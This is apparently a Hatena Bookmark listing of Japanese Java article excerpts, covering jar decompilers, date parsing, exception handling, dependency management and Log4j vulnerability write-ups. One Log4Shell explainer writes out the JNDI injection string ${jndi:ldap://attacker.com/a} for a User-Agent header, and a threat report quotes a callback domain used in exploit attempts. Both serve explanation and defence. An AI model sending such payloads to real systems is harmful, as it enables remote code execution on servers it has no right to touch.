jarファイル(Java)をdecompileする方法する方法まとめ - kapieciiのブログ
jarファイルを解析する場面に出くわしました。 これまでは「jd-gui」を使っていたのですが、ソースコードの取得中に処理が止まる現象が発生したので、「jd-gui」以外の方法について調べました。 発生したエラーコードを含め、今後のためにメモを残しておきます。 目次 ツール jd-gui jad jadx 参考URL 関連本 ツール jd-gui java-decompiler.github.io GUI環境があり、特に説明を見なくても操作ができるくらいシンプルに使えます。 しかし、GUIメニューから「save all resources」jarから復元したjavaコードを保存しようとすると、途中で処理が止まることがありました。 2019/10月時点での最新バージョンは、1.6.3で、1.6.2でも同じ問題が発生することを確認しています。 調べてみると、この問題は数年前からstack ov
JAVAのデコンパイルをする(Java Decompiler)(Mac) - はなちるのマイノート
はじめに 今回はJAVAのデコンパイルをしてみようという記事になります! ネットで調べてみるとJadを用いる記事がほとんどでしたが、なぜかうまくできませんでした。 そこでもう少し探してみるとJava DecompilerというGUIベースでデコンパイルできる良さそうなものを見つけました。 そちらを使って.jar,.classをデコンパイルしていきたいと思います。 はじめに ダウンロード 使い方 さいごに ダウンロード こちらのサイトからダウンロードをします。 java-decompiler.github.io 私はEclipseよりも圧倒的VSCode派なので、プラグインではなくスタンドアロン版のJD-GUIを選択。 解凍すればOKです。 使い方 使い方は簡単で、中身をみたい.jarや.classを開けば中身が見れるはずです。 さいごに こんな簡単にデコンパイルができるなんて驚きですね。
SimpleDateFormatの厳密な・・・setLenient の使い方 - 山崎屋の技術メモ
2013年には2月29日がありませんが、SimpleDateFormat で厳密な解析を行わない(デフォルトの)場合、勝手に2013年3月1日と解釈してくれます。 public class DateSample { public static void main(String[] args) { DateFormat dt = new SimpleDateFormat("yyyyMMdd"); try { System.out.println(dt.parseObject("20130229")); } catch (ParseException e) { System.out.println("Date型に変換できません!!"); } } } 実行結果 Fri Mar 01 00:00:00 JST 2013 日付や時刻を厳密にチェックするには、setLenient メソッドに fals
[Java] OracleJDKの取得方法が大きく変わりました | DevelopersIO
こんにちは。こむろ@東京です。 2017/05/23に気づいたのですが、curlやwgetで実行しているOracleJDKの取得でエラーが出るようになっています。先日(2017/05/22)からChefでも同じような現象があることをStackoverflowで確認しました。 わたしが担当しているプロジェクトで、GoldenAMI作成で使用しているAnsibleでOracleJDKのインストールに失敗したため、原因を調査していましたので共有します。自動スクリプトなどでOracleJDKを自動的にインストールしている構成を取っている方は高い確率で失敗すると思われるため、注意が必要です。 AnsibleのJDKインストールで突然の死 AnsibleでOracleJDKのインストールを行っています。2017/05/23突然死しました。 amazon-ebs: TASK **************
![[Java] OracleJDKの取得方法が大きく変わりました | DevelopersIO](https://cdn-ak-scissors.b.st-hatena.com/image/square/30a2d47409e2c1d5a3c01b1ecbba01690af9a821/height=288;version=1;width=512/https%3A%2F%2Fdevio2023-media.developers.io%2Fwp-content%2Fuploads%2F2013%2F09%2Fjava.png)
SLF4Jの仕組みと使用方法
タグ .NET6スマホメモリリークポリシーセンターフライパンニトリトレッキングトレーサビリティトラブル事例トラブルシューティングデスクテーブル名ダンプタブレットソロキャンプケーブル整理メルカリケーブルトレイキャンプ道具キャンプギャラリーカラム名カスタム属性アプリケーション設定アプリケーション構成XunitExceptionxUnitxhtmlWordPresswildfly11Visual Studio 2022メモリ使用量モバイルWiFiルータVisual Studio広告配信の制限領収書関数式開発ツール郵送設計ポリシー稼働監視システム神津島監査ログ登山口発送方法東海汽船料理拡張属性拡張メソッド天上山ラムダ式多重継承変換回復ドライブ動的プロパティアクセス再セットアップメディア伊豆七島主キーワイヤーネットワイヤーカゴログ出力項目ロギングレンタカーリフレクションランニングVisual Stu
Log4j 2.14.1の脆弱性対応
Log4j で強めな脆弱性が発見されました。 詳細は省きますが、ある条件可で任意のコードが実行できるような脆弱性です。 mavenのリポジトリによってはまだ2.15.0のバージョンが上がっていないようで、少し手こずったので記事にします。 (2021/12/10 13時時点) ※自分が所属するログラスでも依存しているライブラリでしたが、今はすでに修正とリリースが完了しています。 影響ライブラリと影響バージョンは log4j-api と log4j-core の 2.0 <= Apache log4j2 <= 2.14.1 です。 対応としては 2.15.0 に上げればいいそうです。 しかし、2021/12/10 13時現在Mavenのサイトでは2.15.0が上がっていないように見えます。 しかし、こちらの repo1.maven.orgのリポジトリにはあるそうで、素直に2.15.0を指定すれ
【12/31更新】Log4Jの「4つの脆弱性」と使用バージョン別の影響度・緊急度
2021年12月10日に報告されたRCE脆弱性(CVE-2021-44228)をきっかけに、Log4J2ライブラリに対する4つのセキュリティホールが次々と指摘されています。『スッキリわかるJava入門』で学ばれエンジニアとしてご活躍中の方の中には、自身が運用中のシステムに関して、同脆弱性に関する対応にあたられている方もいらっしゃると思われます。 可能ならば、最新版(v2.17.1)に利用バージョンを引き上げるのが理想ではありますが、「つい先日に緊急対応したばかりなのに、再度の緊急対応が必要なのか」等、対処や判断、お客様への説明に悩まれることもあるかもしれません。以下の内容がお役に立てば幸いです。 前提: 報告されている4つの脆弱性 2021年12月31日 日本時間午前1時現在、Log4J2に関して報告されている4つの脆弱性は以下の通りです。 CVE-2021-44228(最初の脆弱性, 2
[2022-03-31 10:00 PDT更新] 脅威に関する情報: Apache Log4jに新たな脆弱性(CVE-2021-44228) 実際の悪用も確認
表2 Log4jのエクスプロイト試行のコールバックURLで見られた上位ドメインとIPアドレス 脆弱なサーバーの発見 私たちが観測したインバウンドのエクスプロイト試行の多くは、エクスプロイト成功を送信者に通知するアウトバウンドリクエストを送信するだけのものでした。これらの試みのすべてがスキャンを目的としていたのか、悪意のあるアクターの偵察活動の一環であったのかは確認できていません。そのなかにはコールバックURLとの最初のやりとりが脆弱なサーバーであることを示すというだけのエクスプロイト試行もあり、その多くは、以下のコールバックURLに見られるような「カナリアトークン」を使用していました。 x[hostname].l4j.2sk9753uabgse6xz75tooe5ix.canarytokens[.]com ただし、アクターがコールバックURLからJavaクラスをロードして実行することにより
![[2022-03-31 10:00 PDT更新] 脅威に関する情報: Apache Log4jに新たな脆弱性(CVE-2021-44228) 実際の悪用も確認](https://cdn-ak-scissors.b.st-hatena.com/image/square/1a2b7b2619f16b9f2c94d1a4a72203b7fd1baa37/height=288;version=1;width=512/https%3A%2F%2Funit42.paloaltonetworks.jp%2Fwp-content%2Fuploads%2F2022%2F12%2FUnit42-blog-2by1-characters-r4d1-2020_Vulnerability-yellow.png)
【図解】Log4jの脆弱性 CVE-2021-44228 (Log4shell or LogJam) について
JNDI とはJava Naming and Directory Interface という、Java アプリケーションが DNS や LDAP 等のサービスを利用するための汎用的なインタフェース (ライブラリ) です。 Log4j と JNDI lookupApache Software Foundation が開発した、Java ベースのロギングに関するライブラリです。JNDI lookup という機能があり、書き込んだログの一部を自動で変数化します。今回はこの機能が悪用されています。 CVE-2021-44228 の攻撃シーケンスの例 攻撃者は脆弱性をトリガーするために http ヘッダの User-Agent に ${jndi:ldap://attacker.com/a} という文字列を埋め込み、http リクエストを送信します。脆弱性のあるサーバの Java App はその通信を
Log4jの深刻な脆弱性CVE-2021-44228についてまとめてみた - piyolog
2021年12月10日、Javaベースのログ出力ライブラリ「Apache Log4j」の2.x系バージョン(以降はLog4j2と記載)で確認された深刻な脆弱性を修正したバージョンが公開されました。セキュリティ関係組織では過去話題になったHeartbleedやShellshockと同レベルの脆弱性とも評価しています。ここでは関連する情報をまとめます。 1.何が起きたの? Javaベースのログ出力ライブラリLog4j2で深刻な脆弱性(CVE-2021-44228)を修正したバージョンが公開された。その後も修正が不完全であったことなどを理由に2件の脆弱性が修正された。 広く利用されているライブラリであるため影響を受ける対象が多く存在するとみられ、攻撃が容易であることから2014年のHeartbleed、Shellshock以来の危険性があるとみる向きもあり、The Apache Software
AWS-SDK for Javaのライブラリ全体をインクルードしていたので個別にインクルードする - Qiita
背景 あるWebアプリケーションでは、AWSサービス(S3、SES、API-Gateway、Lambda等)を利用しています。 開発言語はJavaなのでJava用のAWS-SDK(1.11.560)を使用しています。 問題点 アプリケーションにSDK「全体」をリンクしてしまっていました。 jarファイルの数でいうとなんと171個(version560の場合) <dependency> <groupId>com.amazonaws</groupId> <artifactId>aws-java-sdk</artifactId> <version>1.11.560</version> </dependency> 対策と効果 JavaのAWS-SDKは1.9.0以降は、機能ごとにライブラリを取り込みできるので必要なものだけ利用します。 本アプリケーションでは、API-GatewayとLambdaは
【Java】switch構文で”重複ローカル変数”の警告が出た - CurryPanのブログ
以下のようにswitchのcase文の中でローカル変数を定義したときのことです。 switch (dog) { case SHIBA: String name = "柴太郎"; break; case MAME_SHIBA: String name = "豆太郎"; // "重複ローカル変数"の警告 break; default: break; } switch構文内で2回目に出現したString nameにおいて、"重複ローカル変数"の警告が出現しました。どうやらswitch構文内は同一スコープなのでローカル変数は使いまわせるよ、ということみたいです。 したがって、 switch (dog) { case SHIBA: String name = "柴太郎"; break; case MAME_SHIBA: name = "豆太郎"; break; default: break; } こ
なぜ ArrayList は List 型で宣言するのか - Qiita
と List 型で宣言しすべきと一般的に言われています。 なぜそうなったのか気になったので、調べた結果をまとめました。 ArrayList を List 型で宣言すると... 「これは List インターフェースにある機能だけで充分で、ArrayList 等の独自の機能は必要としていない」ということを明示できる 後で型が変わる場合に変更範囲がより少なくなる 主に上記の2点のメリットを得ることが出来ます。 List 型のメソッドだけで事足りる場合の ArrayList の扱い ArrayList を使う際、ただ要素を Add して取り出すだけといった用途の場合があるかと思います。 そういった際は List インターフェースのメソッドだけで事足りるのですが、もちろんインターフェースは実装しなければ使えないため、List インターフェースを継承した、ArrayList や LinkedList
java例外処理の使用規定 - Qiita
例外処理する際の規定 try,catch,finallyを際の個人的に思う(か、広く守られている)規定についてまとめてみた。 ほか、守るべき内容があれば、コメントください。 try/catchはループ外にする Exception生成は無料ではない。
Javaで特定のエラー以外のときだけ処理をする方法 | クロジカ
ホーム / ハック / Javaで特定のエラー以外のときだけ処理をする方法
RuntimeExceptionとExceptionの違い - daisuke6106のブログ
ブログ2本目!! 今回はJavaの例外で、通常のExceptionとRuntime系Exceptionの違いと、バグの元となりそうな挙動について記載してみたいと思います。 まず、通常の例外の定義方法を以下に記載してみます。 これは通常通りの挙動です。 処理内にて例外が発生する可能性がある場合、 ・自身のメソッドの中で例外を処理 ・呼び出し元に発生した例外を投げて丸投げする を決めることができます。 以下の例では自分で作成したExceptionを継承した例外クラスをthrowしてみます。 当然ですが、throwsを取り除くとコンパイルエラーとなります。 ではRuntimeExceptionを継承した例外クラスをthrowするように修正します。 上記のキャプチャを見るとわかりますが、throwする例外がRuntimeExceptionを継承した例外クラスである場合、throws宣言をしなくても
正規表現パターンにおけるエスケープ処理
特別な意味を持つ文字をエスケープする 正規表現のパターンで使われる文字の中にはドット(.)やプラス(+)などのように特別な意味を持つ文字があります。これらはメタ文字と呼ばれます。例えば次のような正規表現リテラルで見てみます。 文字のまま解釈すると、このパターンは「a」「.」「b」の 3 つの文字が連続している文字列にマッチするように見えます。ただパターンの中でドット(.)は任意の 1 文字とマッチするメタ文字のため、この "a.b" というパターンは "a" で始まり "b" で終わる 3 文字の文字列とマッチします。そのため、 "a.b" だけでなく "axb" や "a8b" などの文字列ともマッチします。 import java.util.regex.*; String regex = "a.b"; Pattern p = Pattern.compile(regex); Matche
Java例外の投げ方メモ(Hishidama's Java throw Memo)
NullPointerExceptionを自分でスローしてはならない NullPointerExceptionは、nullオブジェクトに対してメソッドを呼ぼうとしたりフィールドアクセスしたりしたとき等にJavaランタイムシステムが発生させるもの。 したがって、Java自体の開発者でない限り、NullPointerExceptionをスローするようなコーディングをすべきではない。 駄目な例: public String append(String s, int n) { if (s == null) { throw new NullPointerException(MessageFormat.format("null不可。s={0}", s)); } if (n < 0) { throw new IllegalArgumentException(MessageFormat.format("0
リリース、障害情報などのサービスのお知らせ
最新の人気エントリーの配信
j次のブックマーク
k前のブックマーク
lあとで読む
eコメント一覧を開く
oページを開く
javaで複数の例外をまとめてcatchする - Qiita
HashMap、TreeMap、LinkedHashMapの違いとLRU | infoScoop開発者ブログ